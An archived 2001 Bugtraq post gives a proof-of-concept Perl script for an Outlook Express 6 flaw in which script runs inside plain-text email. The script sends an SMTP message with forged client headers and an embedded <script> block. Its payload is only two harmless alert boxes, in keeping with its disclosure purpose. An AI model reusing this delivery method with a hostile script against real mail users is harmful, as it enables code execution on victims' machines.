[22654] in bugtraq
Proof-Of-Concept Perl Script for Bugtraq-ID: #3334
daemon@ATHENA.MIT.EDU (Mario Schmidt)
Sun Sep 16 19:57:51 2001
Date: 15 Sep 2001 18:17:22 -0000
Message-ID: <20010915181722.10303.qmail@securityfocus.com>
From: Mario Schmidt <info@pcfon.de>
To: bugtraq@securityfocus.com
Saturday, September 15, 2001
Following is a Proof-Of-Concept script, written in
Perl, for the Bugtraq-ID: #3334 security issue,
named "Microsoft Outlook Express 6 Plain Text
Message Script Execution". Credits for this
issue goes to http-equiv@excite.com [mailto:http-
equiv@excite.com], who originally found
this bug.
Usage of this script is very simple. Edit the perl script
and add your favourite SMTP mail host
and your e-mail address, as the program parameter
and finally execute it.
The script is avaible for download as bug3334.pl
[http://pcfon.de/ms.security/bug3334.pl].
#!/usr/local/bin/perl
#
# bug3334.pl
#
# ms.security
#
# Microsoft Outlook Express 6
# Plain Text Message Script Execution
#
# Proof-Of-Concept Perl Script
#
# Version: [0.0.1]
# Last Edit: [2001-09-15]
# Coding: ms.security [info@pcfon.de]
#
# Bugtraq: #3334
[http://www.securityfocus.com/bid/3334]
# Credit: http-equiv@excite.com [http-
equiv@excite.com]
#
use Net::SMTP;
# smtp mailer
# *** Program parameter ***
$mailer='mailhost'; #
smtp host
$to='your@e-mail.com';
# receiver address
# *** Program information ***
@info=
(
"\nms.security\n\n",
"Microsoft Outlook Express 6\n",
"Plain Text Message Script Execution\n\n",
"Proof-Of-Concept Perl Script\n\n",
"Version: [0.0.1]\n",
"Last Edit: [2001-09-15]\n",
"Coding: ms.security [info\@pcfon.de]\n\n",
"Bugtraq: #3334
[http://www.securityfocus.com/bid/3334]\n",
"Credit: http-equiv\@excite.com [http-
equiv\@excite.com]\n\n"
);
# *** Message header ***
@header=
(
'To: ',$to,"\n",
"MIME-Version: 1.0\n",
"Content-Type: text/plain\n",
"charset=\"Windows-1252\"\n",
"Content-Transfer-Encoding: 7bit\n",
"X-Priority: 3\n",
"X-MSMail-Priority: Normal\n",
"X-Mailer: Microsoft Outlook Express 6.00.2600.0000
\n",
"X-MIMEOLE: Produced By Microsoft MimeOLE
V6.00.2600.0000\n",
"\n"
);
# *** JavaScript code ***
@script=
(
"<script>",
"alert(\"freak\");",
"alert(\"show\")",
"</script>"
);
# *** Mail message via smtp mailer ***
print @info;
# info message
print "Connecting to $mailer ...\n"; #
debug message
$smtp = Net::SMTP->new($mailer); #
smtp constructor
$smtp->mail($to); #
mail methode
$smtp->to($to);
# to methode
print "Sending messaging to $to ...\n"; #
debug message
$smtp->data();
# begin of data
$smtp->datasend(@header); #
message header
$smtp->datasend(@script); #
script code
$smtp->dataend(); #
end of data
$smtp->quit;
# terminate smtp
print "Done.\n";
# debug message
# (c) 2001, ms.security, Germany. All rights reserved.
ms.security
M. Schmidt
Web: http://pcfon.de/ms.security/
Mail: mailto:info@pcfon.de
